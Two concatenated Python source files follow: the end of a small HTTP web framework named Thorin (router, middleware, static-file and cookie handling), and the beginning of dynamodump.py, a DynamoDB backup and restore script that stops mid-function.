def get_params(path):
"""
Convert params from path to dict
ex: '?page=1&language=en' to dict
"""
query_res = {}
if path.find('?') != -1:
query = path[path.find('?')+1:]
if query.find('&') != -1:
query_arr = query.split('&')
for q in query_arr:
v = q.split('=')
if len(v) == 2:
query_res[v[0].strip()] = unquote(v[1].strip())
else:
v = query.split('=')
if len(v) == 2:
query_res[v[0].strip()] = unquote(v[1].strip())
return query_res
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
request_queue_size = 1000
class Middleware:
"""
Singleton
Abstract layer between request and custom handler
For example:
protect only auth page, ddos, add some data (like BEFORE REQUEST)
"""
def __init__(self):
self.middlewares = []
def add(self, class_obj):
self.middlewares.append(class_obj)
def use(self, req):
req_result = req
for m in self.middlewares:
req_result = m(req_result)
if not req_result:
break
return req_result
class StaticContentHandler:
"""
Return static files: js, css, images
CSS: By default StaticContentHandler using LESS, but you can use raw css
this class can handle css files like some.css and less like some.less
(prod mode) less files cached after first call and saved memory while Thorin working.
(dev mode) reload less files each request.
you can use GULP, GRUNT or another build system to merge and create less, styl, jade or somthing other.
"""
def __init__(self, req):
self.req = req
mimetype_res = self.mimetype()
if mimetype_res['send_reply']:
try:
ext_list = ['jpg', 'gif', 'png']
if mimetype_res['mimetype'] == 'text/css':
content = self.css()
if not content:
raise IOError
else:
if any(mimetype_res['mimetype'].find(ext) != -1 for ext in ext_list):
f = open('.'+self.req.path, 'rb')
else:
f = open('.'+self.req.path)
content = f.read()
f.close()
self.req.send_response(200)
self.req.send_header("Content-type", mimetype_res['mimetype'])
self.req.end_headers()
if any(mimetype_res['mimetype'].find(ext) != -1 for ext in ext_list):
self.req.wfile.write(content)
else:
self.req.wfile.write(bytes(content, "utf-8"))
except IOError:
self.req.send_error(404)
else:
self.req.send_error(404)
def css(self):
content = None
path = '.'+self.req.path
if os.path.isfile(path):
f = open(path)
content = f.read()
f.close()
else:
path = re.sub('(\.css)', '.less', path, flags=re.IGNORECASE)
if os.path.isfile(path):
f = open(path)
f_content = f.read()
f.close()
for l in thorinService.less_list:
if l['path'] == path:
content = l['css']
break
if not content:
content = lesscpy.compile(StringIO(f_content), minify=True)
if thorinService.env.get('location') and thorinService.env['location'] == 'prod':
thorinService.less_list.append({
'path': path,
'css': content
})
return content
def mimetype(self):
mimetype = 'text/plain'
send_reply = False
if self.req.path.endswith(".html"):
mimetype = 'text/html'
send_reply = True
if self.req.path.endswith(".jpg"):
mimetype = 'image/jpg'
send_reply = True
if self.req.path.endswith(".gif"):
mimetype = 'image/gif'
send_reply = True
if self.req.path.endswith(".png"):
mimetype = 'image/png'
send_reply = True
if self.req.path.endswith(".js"):
mimetype = 'application/javascript'
send_reply = True
if self.req.path.endswith(".css"):
mimetype = 'text/css'
send_reply = True
return {
'mimetype': mimetype,
'send_reply': send_reply
}
class Router:
"""
Singleton
Router can handle http requests like this:
GET /user/:id # in req.params you can get user_id req.params['id']
GET /user/:id? # if you add "?" this param optional
POST /event/create
PUT /events/type/:type?/page/:page you can use optional param anywhere
I was insperied expressjs(nodejs) framework and get simillar format
"""
def __init__(self):
self.routes = []
def add(self, method, path, handler, action, middleware = None):
self.routes.append({
'path': path, # route path. Ex. /user/:id
'method': method, # GET, POST, etc
'handler': handler, # controller name. Ex. IndexController
'action': action, # method name of controller (string), 'get_user'
'middleware': middleware # method or function in list. Ex. [IndexController.is_user_auth]
})
def show_error_page(self, req, code):
req.send_response(code)
req.send_header("Content-type", "text/html")
req.end_headers()
try:
f = open(thorinService.error_folder+'/'+str(code)+'.html')
html = f.read()
req.wfile.write(bytes(html, "utf-8"))
f.close()
except:
pass
def get_params(self, path, route_path):
"""
get all values from path
return dict { param_name: value, ... }
"""
def get_clean_key(key):
return re.sub('\?', '', key).strip()
params = {}
path = re.sub(':', ':', path)
path_list = path.split('/')
route_path_list = route_path.split('/')
index = 0
for r in route_path_list:
if r.find(':') != -1:
key = get_clean_key(r[1:])
try:
params[key] = path_list[index]
except IndexError:
pass
index += 1
return params
def is_param_in_another_route(self, index, param):
res = False
for r in self.routes:
try:
path = r['path'].split('/')
if path[index] == param:
res = True
break
except:
pass
return res
def get_current_route(self, req):
""" find and get current route """
current_route = None
params = {}
req.path = re.sub('\:', ':', req.path)
if len(req.path) > 1 and req.path[-1:] == '/':
req.path = req.path[:-1]
for route in self.routes:
found = True
# if route equal path (doesn`t has params in route)
if req.path == route['path'] and req.command == route['method']:
current_route = route
break
# if route has params
elif ':' in route['path']:
route_path = route['path'].split('/')
req_path = req.path.split('/')
req_path_index = 0
for route_param in route_path:
try:
# route has optional param
if '?' in route_param:
continue
elif route_param != req_path[req_path_index]:
if ':' not in route_param:
found = False
break
else:
if self.is_param_in_another_route(req_path_index, req_path[req_path_index]):
found = False
break
req_path_index += 1
except Exception as e:
logging.debug('Route error %s' % e)
found = False
break
# found route and method(get,post,etc)
if found and req.command == route['method']:
current_route = route
break
if current_route:
logging.debug('current_route %s %s' % (current_route, req.path))
params = self.get_params(req.path, current_route['path'])
return {
'route': current_route,
'params': params
}
def use_middlewares(self, req, original_req, current_route):
"""
start current middleware
main feature - if (request == None) after executing middleware
it`s protected middleware and we send 403 error to client
"""
protected = False
for mid in current_route['middleware']:
req = mid(req)
if not req:
protected = True
break
if not protected:
r = current_route['handler'](req)
getattr(r, current_route['action'])()
else:
self.show_error_page(original_req, 403)
def start_handler(self, req):
if not req:
return None
# save original request
# if middleware return None our request be overrided
original_req = req
current_route = self.get_current_route(req)
if current_route['route']:
req.params = current_route['params']
if not current_route['route']['middleware']:
r = current_route['route']['handler'](req)
getattr(r, current_route['route']['action'])()
else:
self.use_middlewares(req, original_req, current_route['route'])
else:
self.show_error_page(original_req, 404)
def handler(self, req):
"""
first method called from MainHandler class.
we are create new thread and processing client request.
each one request create new thread.
"""
t = threading.Thread(target=self.start_handler, args=(req,))
t.start()
# forward processed request
t.join()
class MainHandler(BaseHTTPRequestHandler):
""" Using BaseHTTPRequestHandler from default Python3 box """
def __init__(self, request, client_address, server):
"""
override default baseHTTP info
add some variables like: cookies, query, path, etc.
"""
self.server_version = 'Thorin/1.0.3'
self.request_version = 'HTTP/1.1'
self.sys_version = ''
self.response_time = time.time()
self.cookies = {}
self.query = {}
self.path = {}
self.remote_ip = ''
BaseHTTPRequestHandler.__init__(self, request, client_address, server)
def add_request_data(self, s):
# Get real ip from headers
if s.headers.get(thorinService.remote_real_ip_header):
s.remote_ip = s.headers[thorinService.remote_real_ip_header]
# Convert cookies to dict
s.cookies = get_cookies(s.headers)
# Convert params to dict
s.query = get_params(s.path)
# Remove params from request path.
# Because we want get clear path. Then we define path in routes
if s.path.find('?') != -1:
s.path = s.path[0:s.path.find('?')]
def do_GET(self):
self.add_request_data(self)
# if this static folder. Call StaticContentHandler
if self.path.find(thorinService.static_folder) == 0:
StaticContentHandler(self)
else:
router.handler(middleware.use(self))
def do_POST(self):
self.add_request_data(self)
router.handler(middleware.use(self))
def do_PUT(self):
self.add_request_data(self)
router.handler(middleware.use(self))
def do_PATCH(self):
self.add_request_data(self)
router.handler(middleware.use(self))
def do_DELETE(self):
self.add_request_data(self)
router.handler(middleware.use(self))
def log_message(self, format, *args):
self.response_time = round(time.time() - self.response_time, 3)
logging.info('%s - [%s] %s - %sms' % (self.remote_ip, self.log_date_time_string(), format%args, self.response_time))
class ThorinServer:
""" Main Init Server Class """
def __init__(self):
self.my_server = None
def start(self, host_name='localhost', port_number='9000'):
""" start listen host:port """
self.host_name = host_name
self.port_number = port_number
# start threaded server. Each request processing by new thread.
# start MainHandler class
self.my_server = ThreadedHTTPServer((self.host_name, self.port_number), MainHandler)
logging.info("%s Server Starts - %s:%s" % (time.asctime(), self.host_name, self.port_number))
try:
self.my_server.serve_forever()
except KeyboardInterrupt:
pass
self.my_server.server_close()
logging.info("%s Server Stops - %s:%s" % (time.asctime(), self.host_name, self.port_number))
class ThorinUtils:
"""
this class extend custom controllers
like this:
class IndexController(ThorinUtils):
def __init__(self):
...
...
ThorinUtils can:
post_data - return post data from forms, POST ajax, etc.
send - return template with data, json format or text/html, etc.
redirect - redirct user to another page
set_cookie - set cookie :)
remove_cookie - delete cookie :)
"""
def __init__(self, req):
self.req = req
self.cookies_list = []
def post_data(self):
""" post_data return data from Forms, post ajax, etc """
form = cgi.FieldStorage(
fp=self.req.rfile,
headers=self.req.headers,
environ={
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.req.headers['Content-Type'],
}
)
return form
def send(self, data={}, code=200, content_type='text/html', path_to_template=''):
""" send data with template to client or send text/html, application/json """
# send cookies
self.req.send_response(code)
self.req.send_header("Content-type", content_type)
for c in self.cookies_list:
self.req.send_header('Set-Cookie', c.output(header=''))
self.req.end_headers()
try:
if content_type == 'text/html':
# if you connect templater Jinga2 or another
if thorinService.t_engine and thorinService.t_engine_render:
# static_data it`s enviroment variables, path to css, js, etc
data['static_data'] = thorinService.static_data
# Access to cookies. You can call cookie variable in template
data['cookies'] = self.req.cookies
# Access to params. All sended params you can show in template
data['params'] = self.req.params
result_data = thorinService.t_engine_render(path_to_template, data)
self.req.wfile.write(bytes(result_data, "utf-8"))
else:
# send raw text/html data
# example: '<b>hello</b>'
self.req.wfile.write(bytes(data, "utf-8"))
elif content_type == 'application/json':
# send json string to client
json_str = json.dumps(data, ensure_ascii=False)
self.req.wfile.write(bytes(json_str, "utf-8"))
except BrokenPipeError as e:
print('########################################')
logging.debug('BrokenPipeError. Connection was broken. %s' % e)
def redirect(self, url):
""" redirect to another page """
self.req.send_response(301)
for c in self.cookies_list:
self.req.send_header('Set-Cookie', c.output(header=''))
self.req.send_header('Location', url)
self.req.end_headers()
def set_cookie(self, name, value, path='/', expires='Wed, 13 Jan 2020 10:00:00 GMT'):
""" set cookie with SimpleCookie() standart python3 class """
c = SimpleCookie()
c[name] = quote(value)
c[name]['path'] = path
c[name]['expires'] = expires
self.cookies_list.append(c)
def remove_cookie(self, name):
c = SimpleCookie()
c[name] = 'deleted'
c[name]['expires'] = 'Thu, 01 Jan 1970 00:00:00 GMT'
self.cookies_list.append(c)
class ThorinService:
"""
Singleton
wrapper for creating middlewares and routes
storage for db connection, env variables, path to static folder, etc
"""
def __init__(self):
# you can save all env right here or use self.glob
self.env = {}
# default language project
self.lang = 'ru'
# database dict. You can create many different links to DB
# example:
# thorinSerivce.db['mysql'] = connect_to_mysql()
# thorinSerivce.db['mongo'] = connect_to_mongo()
self.db = {}
# if you working under Nginx you should specify real user ip.
# nginx directive which is responsible for ip address:
# proxy_set_header X-Real-IP $remote_addr;
# Why "X-Real-IP" - I don`t know. I took this along time ago from stackoverflow discussion
self.remote_real_ip_header = 'X-Real-IP'
# you can set any variable in dict static_data
self.static_data = {
'domain': ''
}
# storage for global variables
# project serphi.com stores there cached events, prices, etc
self.glob = {}
# path to static folder (js, css, fonts)
self.static_folder = '/static'
# template engine
self.t_engine = None
# template engine render
self.t_engine_render = None
# less (css) files list
self.less_list = []
# error folder
# example: 404.html, 502.html, etc
self.error_folder = './templates/errors'
# settings for cookies
self.cookies = {
'httpOnly': True,
'Secure': False
}
# wrapper to add middleware
def add_middleware(self, class_obj):
middleware.add(class_obj)
# wrapper to add route
def add_route(self, method, path, handler, action, middleware = None):
router.add(method, path, handler, action, middleware)
router = Router()
middleware = Middleware()
thorinService = ThorinService()
|
dynamodump.py
|
#!/usr/bin/env python
"""
Simple backup and restore script for Amazon DynamoDB using boto to work similarly to mysqldump.
Suitable for DynamoDB usages of smaller data volume which do not warrant the usage of AWS
Data Pipeline for backup/restores/empty.
dynamodump supports local DynamoDB instances as well (tested with DynamoDB Local).
"""
import argparse
import boto3
import datetime
import errno
import fnmatch
import json
import logging
import os
import re
import shutil
import sys
import tarfile
import threading
import time
import zipfile
from queue import Queue
from six.moves import input
from urllib.error import URLError, HTTPError
from urllib.request import urlopen
AWS_SLEEP_INTERVAL = 10 # seconds
BATCH_WRITE_SLEEP_INTERVAL = 0.15 # seconds
DATA_DIR = "data"
DATA_DUMP = "dump"
DEFAULT_PREFIX_SEPARATOR = "-"
CURRENT_WORKING_DIR = os.getcwd()
JSON_INDENT = 2
LOCAL_REGION = "local"
LOCAL_SLEEP_INTERVAL = 1 # seconds
LOG_LEVEL = "INFO"
MAX_BATCH_WRITE = 25 # DynamoDB limit
MAX_NUMBER_BACKUP_WORKERS = 25
MAX_RETRY = 6
METADATA_URL = "http://169.254.169.254/latest/meta-data/"
RESTORE_WRITE_CAPACITY = 25
RESTORE_READ_CAPACITY = 25
SCHEMA_FILE = "schema.json"
THREAD_START_DELAY = 1 # seconds
json.JSONEncoder.default = lambda self, obj: (
obj.isoformat() if isinstance(obj, datetime.datetime) else None
)
def _get_aws_client(
service: str,
profile: str = None,
region: str = None,
secret_key: str = None,
access_key: str = None,
):
"""
Build connection to some AWS service.
"""
if region:
aws_region = region
else:
aws_region = os.getenv("AWS_DEFAULT_REGION")
# Fallback to querying metadata for region
if not aws_region:
try:
azone = (
urlopen(
METADATA_URL + "placement/availability-zone", data=None, timeout=5
)
.read()
.decode()
)
aws_region = azone[:-1]
except HTTPError as e:
logging.exception(
"Error determining region used for AWS client. Typo in code?\n\n"
+ str(e)
)
sys.exit(1)
except URLError:
logging.exception("Timed out connecting to metadata service.\n\n")
sys.exit(1)
if profile:
session = boto3.Session(
profile_name=profile,
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
)
client = session.client(service, region_name=aws_region)
else:
client = boto3.client(
service,
region_name=aws_region,
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
)
return client
def get_table_name_by_tag(profile, region, tag):
"""
Using provided connection to dynamodb and tag, get all tables that have provided tag
Profile provided and, if needed, used to build connection to STS.
"""
matching_tables = []
all_tables = []
sts = _get_aws_client(profile=profile, region=region, service="sts")
dynamo = _get_aws_client(profile=profile, region=region, service="dynamodb")
account_number = sts.get_caller_identity().get("Account")
paginator = dynamo.get_paginator(operation_name="list_tables")
tag_key = tag.split("=")[0]
tag_value = tag.split("=")[1]
get_all_tables = paginator.paginate()
for page in get_all_tables:
for table in page["TableNames"]:
all_tables.append(table)
logging.debug("Found table " + table)
for table in all_tables:
table_arn = "arn:aws:dynamodb:{}:{}:table/{}".format(
region, account_number, table
)
table_tags = dynamo.list_tags_of_resource(ResourceArn=table_arn)
for found_tag in table_tags["Tags"]:
if found_tag["Key"] == tag_key:
logging.debug("Checking table " + table + " tag " + found_tag["Key"])
if found_tag["Value"] == tag_value:
matching_tables.append(table)
logging.info("Matched table " + table)
return matching_tables
def do_put_bucket_object(profile, region, bucket, bucket_object):
"""
Put object into bucket. Only called if we've also created an archive file with do_archive()
Bucket must exist prior to running this function.
profile could be None.
bucket_object is file to be uploaded
"""
s3 = _get_aws_client(profile=profile, region=region, service="s3")
logging.info("Uploading backup to S3 bucket " + bucket)
try:
s3.upload_file(
bucket_object,
bucket,
bucket_object,
ExtraArgs={"ServerSideEncryption": "AES256"},
)
except s3.exceptions.ClientError as e:
logging.exception("Failed to put file to S3 bucket\n\n" + str(e))
sys.exit(1)
def do_get_s3_archive(profile, region, bucket, table, archive):
"""
Fetch latest file named filename from S3
Bucket must exist prior to running this function.
filename is args.dumpPath. File would be "args.dumpPath" with suffix .tar.bz2 or .zip
"""
s3 = _get_aws_client(profile=profile, region=region, service="s3")
if archive:
if archive == "tar":
archive_type = "tar.bz2"
else:
archive_type = "zip"
# Make sure bucket exists before continuing
try:
s3.head_bucket(Bucket=bucket)
except s3.exceptions.ClientError as e:
logging.exception(
"S3 bucket " + bucket + " does not exist. "
"Can't get backup file\n\n" + str(e)
)
sys.exit(1)
try:
contents = s3.list_objects_v2(Bucket=bucket, Prefix=args.dumpPath)
except s3.exceptions.ClientError as e:
logging.exception(
"Issue listing contents of bucket " + bucket + "\n\n" + str(e)
)
sys.exit(1)
# Script will always overwrite older backup. Bucket versioning stores multiple backups.
# Therefore, just get item from bucket based on table name since that's what we name the files.
filename = None
for d in contents["Contents"]:
if d["Key"] == "{}/{}.{}".format(args.dumpPath, table, archive_type):
filename = d["Key"]
if not filename:
logging.exception(
"Unable to find file to restore from. "
"Confirm the name of the table you're restoring."
)
sys.exit(1)
output_file = "/tmp/" + os.path.basename(filename)
logging.info("Downloading file " + filename + " to " + output_file)
s3.download_file(bucket, filename, output_file)
# Extract archive based on suffix
if tarfile.is_tarfile(output_file):
try:
logging.info("Extracting tar file...")
with tarfile.open(name=output_file, mode="r:bz2") as a:
a.extractall(path=".")
except tarfile.ReadError as e:
logging.exception("Error reading downloaded archive\n\n" + str(e))
sys.exit(1)
except tarfile.ExtractError as e:
# ExtractError is raised for non-fatal errors on extract method
logging.error("Error during extraction: " + str(e))
# Assuming zip file here since we're only supporting tar and zip at this time
else:
try:
logging.info("Extracting zip file...")
with zipfile.ZipFile(output_file, "r") as z:
z.extractall(path=".")
except zipfile.BadZipFile as e:
logging.exception("Problem extracting zip file\n\n" + str(e))
sys.exit(1)
def do_archive(archive_type, dump_path):
"""
Create compressed archive of dump_path.
Accepts archive_type of zip or tar and requires dump_path, directory added to archive
"""
archive_base = dump_path
if archive_type.lower() == "tar":
archive = archive_base + ".tar.bz2"
try:
logging.info("Creating tar file " + archive + "...")
with tarfile.open(name=archive, mode="w:bz2") as a:
for root, dirs, files in os.walk(archive_base):
for file in files:
a.add(os.path.join(root, file))
return True, archive
except tarfile.CompressionError as e:
logging.exception(
"compression method is not supported or the data cannot be"
" decoded properly.\n\n" + str(e)
)
sys.exit(1)
except tarfile.TarError as e:
logging.exception("Error creating tarfile archive.\n\n" + str(e))
sys.exit(1)
elif archive_type.lower() == "zip":
try:
logging.info("Creating zip file...")
archive = archive_base + ".zip"
with zipfile.ZipFile(archive, "w") as z:
for root, dirs, files in os.walk(archive_base):
for file in files:
z.write(os.path.join(root, file))
return True, archive
except zipfile.BadZipFile as e:
logging.exception("Problem creating zip file\n\n" + str(e))
sys.exit(1)
except zipfile.LargeZipFile:
logging.exception(
"Zip file would be too large. Update code to use Zip64 to continue."
)
sys.exit(1)
else:
logging.error(
"Unsupported archive format received. Probably shouldn't have "
"made it to this code path. Skipping attempt at creating archive file"
)
return False, None
def get_table_name_matches(conn, table_name_wildcard, separator):
"""
Find tables to backup
"""
all_tables = []
last_evaluated_table_name = None
while True:
optional_args = {}
if last_evaluated_table_name is not None:
optional_args["ExclusiveStartTableName"] = last_evaluated_table_name
table_list = conn.list_tables(**optional_args)
all_tables.extend(table_list["TableNames"])
try:
last_evaluated_table_name = table_list["LastEvaluatedTableName"]
except KeyError:
break
matching_tables = []
for table_name in all_tables:
if fnmatch.fnmatch(table_name, table_name_wildcard):
logging.info("Adding %s", table_name)
matching_tables.append(table_name)
return matching_tables
def get_restore_table_matches(table_name_wildcard, separator):
"""
Find tables to restore
"""
matching_tables = []
try:
dir_list = os.listdir("./" + args.dumpPath)
except OSError:
logging.info(
'Cannot find "./%s", Now trying user provided absolute dump path..'
% args.dumpPath
)
try:
dir_list = os.listdir(args.dumpPath)
except OSError:
logging.info(
'Cannot find "%s", Now trying current working directory..'
% args.dumpPath
)
dump_data_path = CURRENT_WORKING_DIR
try:
dir_list = os.listdir(dump_data_path)
except OSError:
logging.info(
'Cannot find "%s" directory containing dump files!' % dump_data_path
)
sys.exit(1)
for dir_name in dir_list:
if table_name_wildcard == "*":
matching_tables.append(dir_name)
elif separator == "":
if dir_name.startswith(
re.sub(
r"([A-Z])", r" \1", table_name_wildcard.split("*", 1)[0]
).split()[0]
):
matching_tables.append(dir_name)
elif dir_name.split(separator, 1)[0] == table_name_wildcard.split("*", 1)[0]:
matching_tables.append(dir_name)
return matching_tables
def change_prefix(source_table_name, source_wildcard, destination_wildcard, separator):
"""
Update prefix used for searching tables
"""
source_prefix = source_wildcard.split("*", 1)[0]
destination_prefix = destination_wildcard.split("*", 1)[0]
if separator == "":
if re.sub(r"([A-Z])", r" \1", source_table_name).split()[0] == source_prefix:
return destination_prefix + re.sub(
r"([A-Z])", r" \1", source_table_name
).split(" ", 1)[1].replace(" ", "")
if source_table_name.split(separator, 1)[0] == source_prefix:
return destination_prefix + separator + source_table_name.split(separator, 1)[1]
def delete_table(conn, sleep_interval: int, table_name: str):
"""
Delete table table_name
"""
if not args.dataOnly:
if not args.noConfirm:
confirmation = input(
"About to delete table {}. Type 'yes' to continue: ".format(table_name)
)
if confirmation != "yes":
logging.warn("Confirmation not received. Stopping.")
sys.exit(1)
while True:
# delete table if exists
table_exist = True
try:
conn.delete_table(TableName=table_name)
except conn.exceptions.ResourceNotFoundException:
table_exist = False
logging.info(table_name + " table deleted!")
break
except conn.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying deletion of " + table_name + ".."
)
time.sleep(sleep_interval)
except conn.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying deletion of "
+ table_name
+ ".."
)
time.sleep(sleep_interval)
except conn.exceptions.ResourceInUseException:
logging.info(table_name + " table is being deleted..")
time.sleep(sleep_interval)
except conn.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# if table exists, wait till deleted
if table_exist:
try:
while True:
logging.info(
"Waiting for "
+ table_name
+ " table to be deleted.. ["
+ conn.describe_table(table_name)["Table"]["TableStatus"]
+ "]"
)
time.sleep(sleep_interval)
except conn.exceptions.ResourceNotFoundException:
logging.info(table_name + " table deleted.")
pass
except conn.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
def mkdir_p(path):
"""
Create directory to hold dump
"""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def batch_write(conn, sleep_interval, table_name, put_requests):
"""
Write data to table_name
"""
request_items = {table_name: put_requests}
i = 1
sleep = sleep_interval
while True:
response = conn.batch_write_item(RequestItems=request_items)
unprocessed_items = response["UnprocessedItems"]
if len(unprocessed_items) == 0:
break
if len(unprocessed_items) > 0 and i <= MAX_RETRY:
logging.debug(
str(len(unprocessed_items))
+ " unprocessed items, retrying after %s seconds.. [%s/%s]"
% (str(sleep), str(i), str(MAX_RETRY))
)
request_items = unprocessed_items
time.sleep(sleep)
sleep += sleep_interval
i += 1
else:
logging.info(
"Max retries reached, failed to processed batch write: "
+ json.dumps(unprocessed_items, indent=JSON_INDENT)
)
logging.info("Ignoring and continuing..")
break
def wait_for_active_table(conn, table_name, verb):
"""
Wait for table to be indesired state
"""
while True:
if (
conn.describe_table(TableName=table_name)["Table"]["TableStatus"]
!= "ACTIVE"
):
logging.info(
"Waiting for "
+ table_name
+ " table to be "
+ verb
+ ".. ["
+ conn.describe_table(TableName=table_name)["Table"]["TableStatus"]
+ "]"
)
time.sleep(sleep_interval)
else:
logging.info(table_name + " " + verb + ".")
break
def update_provisioned_throughput(
conn, table_name, read_capacity, write_capacity, wait=True
):
"""
Update provisioned throughput on the table to provided values
"""
logging.info(
"Updating "
+ table_name
+ " table read capacity to: "
+ str(read_capacity)
+ ", write capacity to: "
+ str(write_capacity)
)
while True:
try:
conn.update_table(
TableName=table_name,
ProvisionedThroughput={
"ReadCapacityUnits": int(read_capacity),
"WriteCapacityUnits": int(write_capacity),
},
)
break
except conn.exceptions.ResourceNotFoundException:
logging.info(
"Limit exceeded, retrying updating throughput of " + table_name + ".."
)
time.sleep(sleep_interval)
except conn.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying updating throughput"
"of " + table_name + ".."
)
time.sleep(sleep_interval)
# wait for provisioned throughput update completion
if wait:
wait_for_active_table(conn, table_name, "updated")
def do_empty(dynamo, table_name):
"""
Empty table named table_name
"""
logging.info("Starting Empty for " + table_name + "..")
# get table schema
logging.info("Fetching table schema for " + table_name)
table_data = dynamo.describe_table(TableName=table_name)
table_desc = table_data["Table"]
table_attribute_definitions = table_desc["AttributeDefinitions"]
table_key_schema = table_desc["KeySchema"]
original_read_capacity = table_desc["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table_desc["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table_desc.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table_desc.get("GlobalSecondaryIndexes")
optional_args = {}
if table_local_secondary_indexes is not None:
optional_args["LocalSecondaryIndexes"] = table_local_secondary_indexes
if table_global_secondary_indexes is not None:
optional_args["GlobalSecondaryIndexes"] = table_global_secondary_indexes
table_provisioned_throughput = {
"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(original_write_capacity),
}
logging.info("Deleting Table " + table_name)
delete_table(dynamo, sleep_interval, table_name)
logging.info("Creating Table " + table_name)
while True:
try:
dynamo.create_table(
AttributeDefinitions=table_attribute_definitions,
TableName=table_name,
KeySchema=table_key_schema,
ProvisionedThroughput=table_provisioned_throughput,
**optional_args
)
break
except dynamo.exceptions.LimitExceededException:
logging.info("Limit exceeded, retrying creation of " + table_name + "..")
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying creation of "
+ table_name
+ ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, table_name, "created")
logging.info(
"Recreation of "
+ table_name
+ " completed. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
def do_backup(dynamo, read_capacity, tableQueue=None, srcTable=None):
"""
Connect to DynamoDB and perform the backup for srcTable or each table in tableQueue
"""
if srcTable:
table_name = srcTable
if tableQueue:
while True:
table_name = tableQueue.get()
if table_name is None:
break
logging.info("Starting backup for " + table_name + "..")
# trash data, re-create subdir
if os.path.exists(args.dumpPath + os.sep + table_name):
shutil.rmtree(args.dumpPath + os.sep + table_name)
mkdir_p(args.dumpPath + os.sep + table_name)
# get table schema
logging.info("Dumping table schema for " + table_name)
f = open(args.dumpPath + os.sep + table_name + os.sep + SCHEMA_FILE, "w+")
table_desc = dynamo.describe_table(TableName=table_name)
f.write(json.dumps(table_desc, indent=JSON_INDENT))
f.close()
if not args.schemaOnly:
original_read_capacity = table_desc["Table"]["ProvisionedThroughput"][
"ReadCapacityUnits"
]
original_write_capacity = table_desc["Table"]["ProvisionedThroughput"][
"WriteCapacityUnits"
]
# override table read capacity if specified
if (
read_capacity is not None
and read_capacity != original_read_capacity
):
update_provisioned_throughput(
dynamo, table_name, read_capacity, original_write_capacity
)
# get table data
logging.info("Dumping table items for " + table_name)
mkdir_p(args.dumpPath + os.sep + table_name + os.sep + DATA_DIR)
i = 1
last_evaluated_key = None
while True:
try:
optional_args = {}
if last_evaluated_key is not None:
optional_args["ExclusiveStartKey"] = last_evaluated_key
scanned_table = dynamo.scan(
TableName=table_name, **optional_args
)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.error(
"EXCEEDED THROUGHPUT ON TABLE "
+ table_name
+ ". BACKUP FOR IT IS USELESS."
)
tableQueue.task_done()
f = open(
args.dumpPath
+ os.sep
+ table_name
+ os.sep
+ DATA_DIR
+ os.sep
+ str(i).zfill(4)
+ ".json",
"w+",
)
del scanned_table["ResponseMetadata"]
f.write(json.dumps(scanned_table, indent=JSON_INDENT))
f.close()
i += 1
try:
last_evaluated_key = scanned_table["LastEvaluatedKey"]
except KeyError:
break
# revert back to original table read capacity if specified
if (
read_capacity is not None
and read_capacity != original_read_capacity
):
update_provisioned_throughput(
dynamo,
table_name,
original_read_capacity,
original_write_capacity,
False,
)
logging.info(
"Backup for "
+ table_name
+ " table completed. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
tableQueue.task_done()
def prepare_provisioned_throughput_for_restore(provisioned_throughput):
"""
This function makes sure that the payload returned for the boto3 API call create_table is compatible
with the provisioned throughput attribute
See: https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/dynamodb.html
"""
return {
"ReadCapacityUnits": provisioned_throughput["ReadCapacityUnits"],
"WriteCapacityUnits": provisioned_throughput["WriteCapacityUnits"],
}
def prepare_gsi_for_restore(gsi):
"""
This function makes sure that the payload returned for the boto3 API call create_table is compatible
See: https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/dynamodb.html
"""
return {
"IndexName": gsi["IndexName"],
"KeySchema": gsi["KeySchema"],
"Projection": gsi["Projection"],
"ProvisionedThroughput": prepare_provisioned_throughput_for_restore(
gsi["ProvisionedThroughput"]
),
}
def do_restore(dynamo, sleep_interval, source_table, destination_table, write_capacity):
"""
Restore table
"""
logging.info(
"Starting restore for " + source_table + " to " + destination_table + ".."
)
# create table using schema
# restore source_table from dump directory if it exists else try current working directory
if os.path.exists("%s/%s" % (args.dumpPath, source_table)):
dump_data_path = args.dumpPath
else:
logging.info(
'Cannot find "./%s/%s", Now trying current working directory..'
% (args.dumpPath, source_table)
)
if os.path.exists("%s/%s" % (CURRENT_WORKING_DIR, source_table)):
dump_data_path = CURRENT_WORKING_DIR
else:
logging.info(
'Cannot find "%s/%s" directory containing dump files!'
% (CURRENT_WORKING_DIR, source_table)
)
sys.exit(1)
table_data = json.load(
open(dump_data_path + os.sep + source_table + os.sep + SCHEMA_FILE)
)
table = table_data["Table"]
table_attribute_definitions = table["AttributeDefinitions"]
table_table_name = destination_table
table_key_schema = table["KeySchema"]
original_read_capacity = table["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table.get("GlobalSecondaryIndexes")
# override table write capacity if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
if write_capacity is None:
if original_write_capacity < RESTORE_WRITE_CAPACITY:
write_capacity = RESTORE_WRITE_CAPACITY
else:
write_capacity = original_write_capacity
if original_write_capacity == 0:
